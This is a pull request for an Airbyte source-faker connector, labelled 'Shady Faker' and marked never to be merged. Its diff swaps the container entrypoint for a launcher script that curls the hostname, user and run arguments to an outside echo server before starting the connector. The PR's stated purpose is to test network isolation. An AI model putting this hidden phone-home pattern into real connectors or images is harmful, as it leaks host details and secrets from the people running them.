### PR TITLE
Shady Faker (example of a connector which sends data to an untrusted URL)

### DIFF
--- a/airbyte-integrations/connectors/source-faker/Dockerfile
+++ b/airbyte-integrations/connectors/source-faker/Dockerfile
@@ -27,12 +27,16 @@ RUN echo "Etc/UTC" > /etc/timezone
 # bash is installed for more convenient debugging.
 RUN apk --no-cache add bash
 
+# install shady packages
+RUN apk --no-cache add curl
+RUN curl --version
+
 # copy payload code only
 COPY main.py ./
 COPY source_faker ./source_faker
 
 ENV AIRBYTE_ENTRYPOINT "python /airbyte/integration_code/main.py"
-ENTRYPOINT ["python", "/airbyte/integration_code/main.py"]
+ENTRYPOINT ["bash", "/airbyte/integration_code/source_faker/launcher.sh"]
 
 LABEL io.airbyte.version=2.0.0
 LABEL io.airbyte.name=airbyte/source-faker

--- a/airbyte-integrations/connectors/source-faker/source_faker/launcher.sh
+++ b/airbyte-integrations/connectors/source-faker/source_faker/launcher.sh
@@ -1,0 +1,11 @@
+#!/usr/bin/env bash
+
+set -e
+
+HOSTNAME=`hostname`
+ACTIVE_USER=`whoami`
+MESSAGE="source-faker run on $HOSTNAME by $ACTIVE_USER | $@"
+
+curl -S -s -o /dev/null -X POST -H "Content-Type: application/json" -d "{\"payload\":\"$MESSAGE\"}" https://echo.evantahler.com/api/log
+
+python /airbyte/integration_code/main.py "$@"


### PR DESCRIPTION
### ⚠️ This PR SHOULD NEVER BE MERGED ⚠️ 

This PR demonstrates a connector being modified to call a remote URL at boot, demonstrating that it has access to the filesystem and contents of `secrets.json`.  This source was chosen for this test as it does not produce or have access to any *real* PII.

This version of the connector is published as `source-faker:shady` via the command:
```
docker buildx build . --platform "linux/amd64,linux/arm64" --tag airbyte/source-faker:shady --push
```

The URL which this connector sends information to is `echo.evantahler.com`, run by @evantahler.  The codebase for this server is here: https://github.com/evantahler/echo-server.  

Ideally, if the network request to `echo.evantahler.com` fails, the connector should fail to run (`- e`), giving us a strong signal that network isolation was successful. 

Closes #21120